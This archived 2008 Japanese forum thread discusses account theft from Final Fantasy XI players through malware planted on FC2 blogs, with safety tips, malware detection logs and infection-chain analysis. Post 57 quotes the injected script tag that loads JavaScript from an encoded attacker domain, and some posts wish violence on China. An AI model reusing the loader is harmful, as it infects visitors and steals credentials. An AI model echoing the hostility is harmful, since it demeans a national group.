[表示 : 全て 最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 2chのread.cgiへ]
Update time : 12/01 06:31 / Filesize : 269 KB / Number-of Response : 900
[このスレッドの書き込みを削除する]
[+板 最近立ったスレ&熱いスレ一覧 : +板 最近立ったスレ/記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

●● RMT業者の垢ハックが多発している件14 ●●



1 名前:既にその名前は使われています [2008/03/24(月) 02:50:21.34 ID:7DTVIQ6X]
RMT業者が一般プレイヤーのID・パスワードを盗んで不正にログインし、
アイテムやギルを奪う事件についてのスレッドです。詳細は>>2-10くらい
前スレ→live27.2ch.net/test/read.cgi/ogame/1205225002/
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり)
ttp://ort.sakura.ne.jp/taisai/
FF11Warning(ハッキングに重点をおいて詳しくまとめてあります)
ttp://miku.a.orn.jp/miku2/
FFXI Virus問題 まとめサイト(初心者さん向け)
ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★リアルタイムで被害に遭われている方へ★

まずサポセンに電話し、不正アクセスの被害にあっていると伝えましょう(本人確認の後、対処してくれます)
■スクウェア・エニックス インフォメーションセンター
  TEL:0570-003-399(PHSからは03-5333-1860)
  月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
※サポセンが営業時間外の場合は、別アカウントを所持しているならそれでログインしてGMを呼ぶか、
  他にログインできるアカウントがない場合はサポセンが開いてから電話をすることになります。

2 名前:既にその名前は使われています [2008/03/24(月) 02:50:50.08 ID:7DTVIQ6X]
■アカウントハックとは
主に中国のRMT業者(※1)がFF11関係のサイト(blogや情報サイト等)にアカウント情報を吸い出せる
罠ツールを仕掛けたサイトアドレスを貼り、FF11プレイヤーにそれを踏ませることにより
IDとpassを盗んで不正にログインし、所持アイテムやギルをを奪ってしまう(※2)行為の事です。
ログイン時にパスワードも変更され利用者本人がログイン出来なくなることも多々あります。

奪われたアイテムは各鯖にいるアイテム販売用キャラ(※3)が競売や店売りしてる模様。

※1:blogへの書き込みIP、リンクで飛んだ先のHPアドレスの所持者を調べると中国な為
※2:アイテムを奪われるだけの人も居れば、サーバー移動させられてたりキャラが消されていたりと多種多様の報告があります。
※3:Luckshop等、確認できるだけで21の鯖にいる業者の販売担当キャラ。FFAHで履歴調べると色々分かります

3 名前:既にその名前は使われています [2008/03/24(月) 02:51:08.68 ID:7DTVIQ6X]
■予防と自衛が各プレイヤーに求められています。
被害に遭わないためにも各自でできる限りの防衛手段を身に着けておきましょう。
【公式より抜粋】

▼内容が不明なサイトにアクセスしない
 ※blogのレスの名前部分(HPアド)にリンクをつけてリンクアドレスを見せないようにする手口もあります。
 絶対にリンクを押す前にアドレスを見る事

▼不明なサイトにあるソフトウェアのダウンロードを不用意に行わない

▼Microsoft Update(Windows Update)を定期的に実行し、Windowsを常に最新の状態に保つ
 ※詳しくはマイクロソフト社の公式サイトを参照のこと。

▼利用しているWebブラウザーなどを定期的にアップデートして常に最新のプログラムを使用する

▼スクウェアエニックス社が使用を認めていない外部ツールを絶対に使用しない

▼ウイルス駆除ソフトを常に最新のバージョンで使用する

4 名前:既にその名前は使われています [2008/03/24(月) 02:51:55.37 ID:7DTVIQ6X]
■具体的な自衛策
1:ウイルススキャンソフトを導入する。
  ・シマンテック、カスペルスキー、マカフィー、トレンドマイクロ社のソフトを有料で購入する。
  ・AVG、AntiVir、avast!、BitDefenderなどの無料ソフトをダウンロードして使用するという手もあります。

2:WindowsUpdateでWindowsを最新の状態にする
   Windowsは最初にインストールしただけで万全というわけではなく、次々と発見されるセキュリティホールを
   後付で修正し、それをWindowsUpdateで配布することで安全性を保つようにできています。
   一般的には自動更新がされるよう設定されていますが、重いからという理由で自動更新機能を
   オフにしている人もいると思います。その場合は必ず定期的に手動で更新を行ってください。

3:ファイアウォールを有効にする
  ・1に上げた有料ソフト等に同梱されているものや、同じ会社から出ているものを使う

  ・ベクターや窓の杜などでフリーのファイアウォールソフトを探し、導入する
   (2chカテゴリ「ネット関係」>「セキュリティ」板にフリーのファイアウォールソフトの
    スレッドがあります。「ファイアウォール」などの単語で検索してください)

5 名前:既にその名前は使われています [2008/03/24(月) 02:52:01.80 ID:EkJgurYg]
業者あげ

6 名前:既にその名前は使われています [2008/03/24(月) 02:52:10.54 ID:7DTVIQ6X]
■具体的な自衛策その2

4:IPフィルタを導入する
  PeerGuardian2というフリーソフトで特定の国(この場合は特に中国)のIPへのアクセスを遮断できます

  ★PeerGuardian2の導入・設定方法はここから
    リネージュ資料室 ttp://lineage.nyx.bne.jp/misc/security/id_basic-ipfilter.html
    このURLを踏みたくない人はgoogleで『リネージュ資料室』で検索してメニューから
    セキュリティー対策→IPフィルタ で確認してください。

5:IE以外のウェブブラウザを使用する
  Firefox、Opera、など。
  ただしそれぞれのブラウザにもセキュリティホールが見つかることもあるので、
  ブラウザ自体のアップデートも行う必要があります。

6:不審な・見覚えの無いURLを踏む必要がある場合は、まずaguse.jpやソースチェッカーを使用する。
  ttp://www.aguse.jp/ 
  URLを入力するとそのページのSSとドメイン情報、各ブラックリストに照らし合わせた結果が表示されます。
  ソースチェッカーにはWebページ上のものと、DLして使用できるフリーソフトがあります。

7 名前:既にその名前は使われています [2008/03/24(月) 02:52:30.81 ID:7DTVIQ6X]
■もし被害に遭ってしまった場合
「ある日突然登録してあるパスワードでログインできなくなった」もしくは「ある日ログインすると
キャラクターのアイテムやギルが奪われていた」等の、不正アクセスと思しき被害にあった場合は、
まず>>1にあるサポセンの連絡先に電話してパスワードの再発行を受けたり、不正アクセスの被害を
受けたことを報告しましょう。

現時点(平成19年10月下旬)でのスクウェアエニックス社インフォメーションセンターの。不正アクセス被害者への
対応は、「社内の調査だけでは不正アクセスと断定することができない」という調査結果の報告のみです。

不正アクセスと断定できないとはつまり、「RMT業者に自発的にアイテムやギルを受け渡したのは
被害者本人である」ということにされている状態です。

この状態の打開及びさらなる追及を望むならば、警察への届出が必要になります。
不正アクセス行為の禁止等に関する法律、通称不正アクセス禁止法においては、
こういった事例での被害者は「不正アクセスをされた側」つまりスクウェアエニックス社になりますが、
アカウントを乗っ取られた側でも「利用権の侵害」として被害を届出することができます。

8 名前:既にその名前は使われています [2008/03/24(月) 02:52:49.34 ID:7DTVIQ6X]
■警察への通報方法
1:まず住んでいる都道府県警が設置しているサイバー犯罪相談窓口に相談の電話やメール送信をしておきます。
  都道府県警察本部のサイバー犯罪相談窓口等一覧
  ttp://www.npa.go.jp/cyber/soudan.htm

2:相談窓口から「所轄の警察署に直接行って相談するように」という返事が来ます。
  (この段階を踏まずに直接所轄署に行くと、「専門の窓口に連絡しろ」と言われてしまう可能性があります)

3:所轄署に電話で連絡し、直接訪問して話を聞いてもらえるか確認します。

4:資料を持参して所轄の署に赴き、「利用権の侵害」での被害を報告します。
  「たかがゲームのアイテムを取られたからって警察に行くなんて…」という方もいるかもしれませんが、
  家族やネット上、またこのスレッド内でそういったことを言われても気にせず警察に相談しください。
  利用権の侵害というのは立派な被害です。警察の方もちゃんと話を聞いてくれます。

9 名前:既にその名前は使われています [2008/03/24(月) 02:53:03.17 ID:7DTVIQ6X]
■警察へ行く際に持っていく・用意しておくもの
過去スレで実際に警察へ行った被害者のレスから抜粋

もっていったもの †
o スクエニの会社情報 HPのプリントアウトしたもの
o プレイオンラインサポセンの電話番号
o 印鑑、身分証明
受け答えしてくれたサポセンの人の名前も伝えるといいかも


警察で聞かれたもの †
o プレイオンラインのIDとパスワード
o キャラ名
o 犯行時間帯
o 被害内容(なくなったゲーム内通貨・アイテム)
o プロバイダ

10 名前:既にその名前は使われています [2008/03/24(月) 02:53:56.36 ID:7DTVIQ6X]
■このスレの目的
1:予防・自衛の徹底の周知
2:被害報告の収集
3:罠サイトURIの収集
4:被害者が現れた場合に対処をアドバイスする

★age進行(mail欄に何も書かない)でネ実民及びFF11プレイヤーへの周知と啓蒙にご協力ください

☆「スクエニ社に法的責任を!」や「誰が悪いかランキング」、「被害者の会を作れ」等の議論も
この場で行ってくださって構いませんが、スレを見に来た一見さんの質問や被害者の報告は
無視せずに対応してください。



11 名前:既にその名前は使われています [2008/03/24(月) 02:54:22.50 ID:7DTVIQ6X]
■アカウントハックの救済について署名して下さい
ttp://www.petitiononline.com/FFvoice/petition.html
[Click Here to Sign Petition]=請願に署名して下さる方はこちらをクリックして下さい。

Name=名前(必須)  Email Address=メール(必須)  Real name=本名(任意)  Server name=サーバー(必須)

Email Address Privacy Option=メールアドレスプライバシーオプション
:Private=署名妥当性確保のためのメールアドレスですプライベートでスクウェアに提供されません
:Available to Petition Author=プライベートですがスクウェアに提供されます
:Public=全ての人が閲覧可能です

[Preview Your Signature]=貴方の署名を確認します

View Signatures Without Signing=署名をしないで他の署名を見ます

12 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 03:04:30.88 ID:vQXYTLxz]
>>1



ウエブマニー組で今現在パス抜き被害あってないから安心したってやってたら、課金後
に被害食らうかもしれんね。

13 名前:既にその名前は使われています [2008/03/24(月) 03:05:44.32 ID:EkJgurYg]
紙媒体しか安心して見れないこんなFFじゃ

14 名前:既にその名前は使われています [2008/03/24(月) 03:16:22.91 ID:mYAh1jWO]
RMTする人達が減ったのかな?o(`ω´*)o

15 名前:既にその名前は使われています [2008/03/24(月) 03:19:43.83 ID:euFX6pRg]
中国はマジで腐った国だな。

16 名前:既にその名前は使われています [2008/03/24(月) 03:21:27.29 ID:BS8RD3fS]
いちょつ

17 名前:既にその名前は使われています [2008/03/24(月) 03:22:44.14 ID:BS8RD3fS]
前すれ>>995
あいあい
こっちに移動したよ

18 名前:既にその名前は使われています [2008/03/24(月) 03:24:47.93 ID:IxSaroBR]
カスペのオンラインスキャンが動くブラウザを使わないほうがいいぞ
あれが動かないブラウザのほうがセキュリティ的には信用できる
オペラなんて罠ページ踏んでも(だいたい)平気だぜ・・・普通のページも見れないことあるが・・・

19 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 03:34:30.07 ID:xPk7dngc]
>>15
自分が痛くなければ何やっても愛国無罪な国だからな

20 名前:既にその名前は使われています [2008/03/24(月) 03:43:51.91 ID:l9SAEJ0+]
>>13
poizun



21 名前:既にその名前は使われています [2008/03/24(月) 03:50:16.95 ID:Df86aKNo]
ヴァナモンブログちょっとひどくね?
改ざんされたことを責めるつもりは毛頭ないが、そのことに触れずにしれっと直して
あたかもなにもありませんでした、みたいなのはチキンすぎる。
自分のブログに訪れてくれた読者に対して申し訳ないとか思わないのかね?
こういうのを認めると今後そういうやつが増えて被害拡大するとおもうんだ。

22 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 03:54:32.57 ID:vQXYTLxz]
ネットは自己責任。
叩き所が間違ってる。

23 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 03:56:10.23 ID:ExAbIYmH]
まぁ注意喚起位すればいいとは思うけど、fc2のせいであってヴァナモンのせいじゃないしな。
どちらかといえばfc2がページの上に告知するとか
問題を抜本的に解決できるような方法を提示しないこと、またそれを実行しないことが問題。

24 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 03:59:36.99 ID:8jcNID1A]
前スレ57, 63( live27.2ch.net/test/read.cgi/ogame/1205225002/57,63 )の
xia.exeを実行してカスペルスキー試用版でのスキャン終了

(1/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\05S94ZKH\1ro[1].exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8DUF8TQ3\laoie[1].exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\8X2ZG5A3\geizi[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\CNA1O3S3\3ff11[1].exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\Documents and Settings\User1\Local Settings\Temporary Internet Files\Content.IE5\S1ANG1QF\2t1[1].exe
検知: トロイの木馬 Trojan-Downloader.Win32.Delf.dsz
 →ファイル: C:\Program Files\Common Files\Microsoft Shared\MSINFO\SysInfo.wmp
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\Help\3EC849F38E63.dll
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\Help\3EC849F38E63.exe

25 名前:既にその名前は使われています [2008/03/24(月) 04:00:24.85 ID:8jcNID1A]
(2/2)
検知: トロイの木馬 Trojan.Win32.Inject.agc
 →ファイル: C:\WINDOWS\system32\1.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.lbb
 →ファイル: C:\WINDOWS\system32\2.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.sfa
 →ファイル: C:\WINDOWS\system32\3.exe
検知: アドウェア not-a-virus:AdWare.Win32.BHO.cd
 →ファイル: C:\WINDOWS\system32\4.exe//FSG
検知: トロイの木馬 Backdoor.Win32.Hupigon.dsx
 →ファイル: C:\WINDOWS\system32\5.exe
検知: トロイの木馬 Trojan-PSW.Win32.OnLineGames.pnr
 →ファイル: C:\WINDOWS\system32\krnp32drv.dll
検知: アドウェア not-a-virus:AdWare.Win32.BHO.aj
 →ファイル: c:\windows\system32\xunleibho_001.dll

こんな感じ

26 名前:既にその名前は使われています [2008/03/24(月) 04:03:02.46 ID:Q/ktx4QO]
>>21
ヴァナモンブログ主を責めるのはちょっとひどくね?
改ざんされたテンプレートをそのまま放置しているfc2を責めることをせずに、
個人を叩いてひゃっほい、みたいなのはチキンすぎる。
運営しているサイトに訪れてくれた読者に対してfc2は申し訳ないとか思わないのかね?
こういうのを認めると今後こういう運営をするやつ増えて被害拡大するとおもうんだ。

であろう?

27 名前:前スレ969 mailto:sage [2008/03/24(月) 04:06:50.23 ID:Vn0/fEwr]
カスペルのスキャンが1時間早く終わったーヽ(´ー`)ノ
結果はバスターさんの前に使ってたノートン先生の置き土産が、マルウェアに勘違いされたくらいですた。

以前から使っていたPG2とFirefox&IFRAMEの禁止、今回のカスペルくらいが
自分みたいな素人ができる自衛手段ですかのう。

あ、今使ってるHUBの機械が8年前から使ってるcoregaっていうメーカーのなんだけど、これってマズイ?(´・ω・`)

28 名前:既にその名前は使われています [2008/03/24(月) 04:13:56.30 ID:Df86aKNo]
もちろんまずはfc2が何か言うべきとは思うけどさ。
今後まだまだ改ざんブログが増えるであろうことを考慮すると
その事実を個人レベルで隠蔽するような行為はどうかと思ったんだ。
このスレ的にはブログで事実報告の必要は無いって意見が多いってことか、了解。

29 名前:既にその名前は使われています [2008/03/24(月) 04:16:01.17 ID:Q/ktx4QO]
Trojan.Win32.Inject.agc
 まず、こいつがきっかけで次のダウンローダを起動する。
Trojan-Downloader.Win32.Delf.dsz
 次の4種のワームをダウンロードし、常駐させる。
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.lbb
Trojan-PSW.Win32.OnLineGames.sfa
Trojan-PSW.Win32.OnLineGames.pnr
 各MMOに対応したID/pw保存ファイルサーチャ
Backdoor.Win32.Hupigon.dsx
 上記4種のワームが検出したID/pw保存ファイルを
 どこぞに送信するためのポートを開けるとともに
 遠隔操作用のポート開けて常駐して待機する。

そして、見事にBOT-NET入りを果たすと。

30 名前:既にその名前は使われています [2008/03/24(月) 04:26:34.88 ID:B+yN8em4]
いつも見てるFF系ブログの大半がFC2だったわ・・・・
カスペでスキャンしてなんともなかったから良かったが、怖くて暫くはブログ見れないな。



31 名前:既にその名前は使われています [2008/03/24(月) 04:26:41.08 ID:Q/ktx4QO]
>>28
いいか?
改ざんしたのはブログ主ではなく、悪意のテンプレートにしたやつがいて
悪意のあるテンプレートを供給していた運営者がいるんだよ。

つまり、
 改ざんしたテンプレートを運営者に出したやつが主犯
 そのテンプレートをまともにチェックせずに公開したやつが共犯
なのさ。
本当に叩く先がどこか分かるよな?

確かに注意勧告をブログ主もするとベターだろうが、
ブログ主もクラックされた被害者な訳だ。

32 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:28:56.31 ID:uo1cC9cX]
手動でパス打つほうが危ないなんてことは・・・ないよね?

33 名前:既にその名前は使われています [2008/03/24(月) 04:31:35.92 ID:Q/ktx4QO]
>>30
BLOGを読むときの手として、直接行くのではなく、RSSリーダで読むのもあり。
なぜかというと、直接行くと、テンプレートを含む全体を読み込むが
RSSリーダならば、本文しか普通は読み込まない「はず」

34 名前:既にその名前は使われています [2008/03/24(月) 04:32:51.75 ID:juaPfmeM]
でもさ、ヴァナモンblogで感染して
それを知らずに感染したまま今もヴァナモンblogを見ている人もいると思うんだよね。

叩く矛先の優先順位の問題ではないと思うんだ。

35 名前:既にその名前は使われています [2008/03/24(月) 04:34:12.73 ID:Q/ktx4QO]
>>32
>>29のTrojan-PSW.Win32.OnLineGamesの4つが
キーロガーに変わったらどうなるだろうね?

どっちが安全なんてないね。
つか、キーロガーの方が広範囲に情報取れるな。

36 名前:既にその名前は使われています [2008/03/24(月) 04:35:57.93 ID:Df86aKNo]
>>31
わかった、っつってるのに粘着なヤツだなw

>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ
今のところこれに関しては事実関係が確定してないと思ってたんだが確定したのか?


37 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:36:36.60 ID:vQXYTLxz]
そこまで粘着するなら本人に言えとしか、是非をうんぬんするスレじゃないよ。

38 名前:既にその名前は使われています [2008/03/24(月) 04:37:03.15 ID:/fj6dMAF]
ちょっと聞きたいんですけど
ヴァナモンblogではなく
ヴァナモンでのモンスター検索の方は大丈夫なんでしょうか?
個人的にblogは見ずに検索だけをメインにしてたので・・・


39 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:37:42.86 ID:l9SAEJ0+]
個人にそういう役目を担わせる義務はないだろうから
人目につくネ実で、スレ保持/情報共有、注意呼びかけるなど。
有志アカハク専用サイトあんだし。

40 名前:ヴァナm ◆ZrzGMHfgII mailto:sage [2008/03/24(月) 04:37:53.33 ID:0CiVccUT]
>>21
テンプレ改竄問題は知ってたけど、
ウチがテンプレ改竄されたの今知って飛んで来たところなんだが
毎日毎日業者のコメントがウザかったので丁度数日前にhttp://をNGワードにしたんだよな
その報復なんだろうか
でテンプレチェックしてるんだけど、どう直せばいいのか教えて欲しいんだが
テンプレには%77とか入ってないぞ?



41 名前:既にその名前は使われています [2008/03/24(月) 04:38:13.47 ID:8jcNID1A]
ノートンが検出できない4種類のファイルを検体としてシマンテックに送付した

42 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:38:46.92 ID:TfhGREOv]
>>27
8年前程度なら、すでにバカHUB入手しづらくなってたと思うから、
スイッチングHUBじゃね?



43 名前:既にその名前は使われています [2008/03/24(月) 04:39:47.13 ID:Xxx+f+/4]
粘着っつうか、過剰擁護に反論してるだけだろ

44 名前:既にその名前は使われています [2008/03/24(月) 04:40:06.77 ID:Q/ktx4QO]
>>34
fc2がテンプレートの配布と利用を止めたらどうなるかね?
読めないのを不思議に思って、読者は何かするんじゃないか?
まぁ、何もしない読者だから感染するんだけどさ。

「ブログ主が注意勧告するのはベターだ」が、
自責としてメインで動くべきは運営側であろう?

45 名前:既にその名前は使われています [2008/03/24(月) 04:43:33.34 ID:8jcNID1A]
>>40
ヴァナモンの人こんばんは
私が夕方に見たときにはすでに無くなってたのでなんとも

46 名前:既にその名前は使われています [2008/03/24(月) 04:43:37.03 ID:Df86aKNo]
>>40
本人キター、って・・・あれ?直してないの?
ソースチェッカーで改ざんされてたのをオレは確認してて、
ソースが消えたのも確認したんだが・・・・なんで消えたんだろう?

47 名前:ヴァナm ◆ZrzGMHfgII mailto:sage [2008/03/24(月) 04:44:07.46 ID:0CiVccUT]
というかもう直ってるの?>>21でしれっと直してって書いてあるんだけど
俺は何も弄ってないんだけどな

3週間くらい前だったかな?ブログにFC2のブログがハックされて〜
ヴァナモンさんも注意してくださいってブログにコメントくれた人が居たんだよね
でその時もチェックしたけどそれっぽいのは無かったし

48 名前:既にその名前は使われています [2008/03/24(月) 04:44:15.26 ID:juaPfmeM]
>>44
だからその「サイトで勧告するのがベターだよね」という話でしょ。
FC2よりもまずヴァナモンを叩くという話ではないはずなのに
なぜかそういう方向へ持っていって擁護されるんだよね。

49 名前:ヴァナm ◆ZrzGMHfgII mailto:sage [2008/03/24(月) 04:45:27.27 ID:0CiVccUT]
とりあえず前スレを確認してきます

50 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:49:01.17 ID:vQXYTLxz]
しれっと直してやのその事実を個人レベルで隠蔽するような行為やの書いてる
奴は叩きと認識されるでそ。

FF取り上げる全てのサイトやネ実でななしやロカルーででかでかと注意喚起すべき
だろうけどね。



51 名前:既にその名前は使われています [2008/03/24(月) 04:49:45.63 ID:rpE40Jdl]
iframeもなかったのかな。勝手に消えたって、業者が埋め込んでまた消すってあるのかな???

52 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:50:12.06 ID:uo1cC9cX]
ここまで、話題になったんだから、国レベルで、どうにかしてほしいもんだ

53 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:53:02.27 ID:5r7sQEdf]
中国人は最近ではチベットの件とかいろいろ物議醸し出してるからなぁ
それでなくても「中国、韓国お断り」は俺の知ってる世界では常識だし

国レベルで中国に核を落としてくれたらいいのにね

54 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 04:53:53.96 ID:QCo+vR7/]
>悪意のあるテンプレートを供給していた
>改ざんしたテンプレートを運営者に出したやつ

ここは私も気になる所です
ブログのテンプレはDL以降、ブロガー個人での管理になるから
有名ブログのテンプレ改竄はブログ管理のID・passの漏洩によって
発生する場合が大半だと思っていたけど実際はどうなんでしょうか?

悪意のあるテンプレートが公開されているケースもないとは言えませんが

55 名前:既にその名前は使われています [2008/03/24(月) 04:54:41.34 ID:dI49kwAF]
>>46
仕込まれてたのはscript?
iframeなら広告が原因だろうか。

56 名前:既にその名前は使われています [2008/03/24(月) 04:55:15.07 ID:Q/ktx4QO]
中国自体が核保有国だから、なんかしでかしてくれるのを期待したいw

57 名前:既にその名前は使われています [2008/03/24(月) 04:56:23.92 ID:A+UNPr50]
>>47
エントリーのブロックが終わって
<<--!コメント-->>の直下に
<script language="javascript"
 src="hxxp://%77%77%77%2E%66%63%63%6A%61%2E%63%6F%6D/%65%2E%6A%73"></script>
こんなんがあった
本来はhttpだったが誤アクセス防止にxxにしといた。

本人が直したんじゃないってことはグーグルに気づかれたために業者が直したかのかな
ヴァナモンをグーグルで検索すると危険サイトに指定されている。

58 名前:前スレ969 [2008/03/24(月) 04:57:03.38 ID:Vn0/fEwr]
>>42
おお、ありがとう。
家族がネットでの自己防衛に無頓着&家族にすらPC触らせたがらないんで心配だったんよ(´・ω・`)
大丈夫そうなんで、当分の間HUBはいまの機械使っておくよ。
さすがにやばいんで寝る。
夜までこのスレが生き残っていることを祈りつつあげ!

59 名前:既にその名前は使われています [2008/03/24(月) 04:58:18.68 ID:A+UNPr50]
>>55
広告が原因って意味不明なんだが
ちなみに黒魔の軌跡のところは最初iframeだったのがいつのまにかscriptにかわってた
業者が何度も改竄してるとみるべきじゃねーか?

60 名前:ヴァナm ◆ZrzGMHfgII mailto:sage [2008/03/24(月) 05:02:56.71 ID:0CiVccUT]
3/19の夜にhttp://をNGワードにしたんだよな
それからパッタリ業者のコメント無くなってたんだが
それの報復ぽよなぁ。
となると3/19以降に仕掛けられた可能性が高いと思う。
つーか他のFC2のサイトと違うテンプレ使ってるし
防ごうとして防げるのこれ?



61 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 05:03:26.19 ID:l9SAEJ0+]
ヴァナモンのグーグルの表示が危険URL指定なのか
確かめたら本当だった
tune.ache-bang.com/~vg/outitem/up/img/19041.jpg

62 名前:既にその名前は使われています [2008/03/24(月) 05:04:26.58 ID:A+UNPr50]
>>60
テンプレ何つかってるとかそういう問題じゃない
あとNGとか関係ねーとおもうよ
割とアクセス多いところを狙ってるみたいだし

最初は検索トップにでるサイトだけだったが
今はなりふり構わず無差別になりつつある

63 名前:既にその名前は使われています [2008/03/24(月) 05:05:16.22 ID:mrzccnLo]
>>32
ID Managerとかは使えないの?キーロガーには引っかからない&クリップボード経由でもなくなる。
PCじゃFFしないから知らないけどw

64 名前:既にその名前は使われています [2008/03/24(月) 05:05:57.77 ID:rpE40Jdl]
報復ってより、今はどこもコメント承認制だったりで
てっとり早く感染させられる改竄の方主流にしだしたとかかもですね

65 名前:既にその名前は使われています [2008/03/24(月) 05:06:05.62 ID:Q/ktx4QO]
>>57
それ、まだ生きてるな。
ActiveX起動して、www■fccja■com/d2.aspに飛ばしとる。
で、%うんたらってとこからすると、UTFじゃない?

66 名前:既にその名前は使われています [2008/03/24(月) 05:06:33.24 ID:Df86aKNo]
>>60
自分で直したんじゃないのなら業者が再利用するために消したって可能性あるね。
まずはfc2のパスワード変えてみたらどうだろう?

67 名前:既にその名前は使われています [2008/03/24(月) 05:09:43.58 ID:Q/ktx4QO]
>>61
うひ、誰ぞサイトアドバイザに報告したのがいるんだわw

68 名前:ヴァナm ◆ZrzGMHfgII mailto:sage [2008/03/24(月) 05:20:56.66 ID:0CiVccUT]
えーとそれで、ウチ見て感染した場合はカスペルキーとかいうのでチェックがいいのかな?
普通のウイルススキャンじゃ引っかからない?
googleのキャッシュはブログが有害指定されてるから無いっぽいので
いつのキャッシュから判断してるのか分からないけど
土曜の深夜に誰か気づいたってことは、仕込まれたのやっぱ先週中頃以降じゃないのかなぁ
ヴァナモンで検索して>>61になったら誰かすぐ気づくだろうし

69 名前:既にその名前は使われています [2008/03/24(月) 05:21:04.67 ID:Q/ktx4QO]
時期と手口からすると、これ近いんじゃないかと思ったり。
 ttp://www.itmedia.co.jp/news/articles/0803/14/news018.html

70 名前:既にその名前は使われています [2008/03/24(月) 05:24:10.66 ID:Q/ktx4QO]
>>68
今まで検出してくれた報告があるのは、カスペルスキーだけですな。
オンライン版
 ttp://www.kaspersky.co.jp/virusscanner
体験版
 ttp://www.kaspersky.co.jp/trials
を紹介しておくとよいかも?



71 名前:既にその名前は使われています [2008/03/24(月) 05:25:08.58 ID:zadZE9R9]
管理できないなら削除しろ

大きな被害でてるぞ

72 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 05:26:24.57 ID:XNnaYNDD]
ほんとに業者やりたい放題だな
FC2運営内部にRMT関係者か金を貰って工作している奴がいるとしか思えん
対策出来ない以上はblogを見ないという選択肢しか無いじゃん

73 名前:既にその名前は使われています mailto:sage [2008/03/24(月) 05:28:54.65 ID:l9SAEJ0+]
今の所ブログのみで、
HPコンテンツ等のメインサーチの方は
改ざんなさそうだね。

74 名前:既にその名前は使われています [2008/03/24(月) 05:30:14.79 ID:nn2RN4KX]
>>69
そこのサイトの過去の記事ttp://www.itmedia.co.jp/enterprise/articles/0803/12/news112.html
に、同社によれば、このマルウェアはオンラインゲームの情報をPCから盗み出すタイプだと推定されるという。
という件があるな。

75 名前:既にその名前は使われています [2008/03/24(月) 05:31:10.21 ID:dI49kwAF]
落ち着くまで、パスワードかけて非公開にしとくとか。
パス認証画面が安全かどうかは分からんのだが。

76 名前:既にその名前は使われています [2008/03/24(月) 05:43:24.08 ID:f8U+hHlG]
>>68
いまいち原因把握出来て無さそうだし、一時的にでもブログ停止した方がよくないか?
今まで随分お世話になって偉そうな事を言うのもあれだが、いつまたやられるかわからんぞ



77 名前:既にその名前は使われています [2008/03/24(月) 05:51:44.38 ID:sV5MTkg6]
ヴァナモンブログが利用していたテンプレートに最近何か仕込まれて、今日までにかなり感染した。
現在では、そのテンプレートは何も仕込まれてないものに修正されている。

こういうことか?

テンプレの提供元であるfc2に問題があると?

78 名前:既にその名前は使われています [2008/03/24(月) 06:01:37.22 ID:9jGDstCn]
"%77%77%77%2E%〜" ってのは普通の人間はぱっと見が書かれてるか判らん罠。
URLを16進コードで書いたもので"www.〜"ってコトなんだけど
ブラウザが自動変換してたら%77で検索しても意味無いかも。

>>57に書かれてる謎の文字列を変換するとhellh■netへのurlになる。


79 名前:既にその名前は使われています [2008/03/24(月) 06:31:03.34 ID:8CSFG+dl]
こんな時間に新スレ移行したのか、いちおつ。
もしかしたらまとめの人がログ取り切れてないかもしれないから、
誰か一応前スレのログを保存しといてくれ。俺は携帯なんでできないんだ

80 名前:既にその名前は使われています [2008/03/24(月) 06:41:19.69 ID:QCo+vR7/]
FC2から公開されている段階のテンプレには(おそらく)問題なく、
テンプレをDLした後に、ブログの管理画面で利用者(ブロガー)個人がテンプレの
ソースを改変することが出来るから、そこで改竄されたんだと思っています。

FC2ブログの管理画面に行く際に必要なIDとpassの内
IDはそのブログURLの一部に使われているから一目瞭然で、passだけ判明してしまえば
ブログ管理画面にいけてしまうんですよね

passだけなら総当りで試行すれば簡単に一致してしまいそうな気が…

私もFC2でブログを書いているんですが、これを気に閉鎖しようと思っています



81 名前:既にその名前は使われています [2008/03/24(月) 06:57:03.29 ID:hdKDzAOI]
試しにカスペルスキーのオンラインスキャンしたら
こんな物が引っかかったのだけれど…
ググってもよくわからん

not-a-virus:PSWTool.Win32.Messen.n

これってやられちゃってる?(ノω`)

82 名前:既にその名前は使われています [2008/03/24(月) 07:01:42.72 ID:JYmJyemP]
カスペ関連で一気にFF潰せそうな勢いだなの

83 名前:既にその名前は使われています [2008/03/24(月) 07:04:39.69 ID:n0XTFGnb]
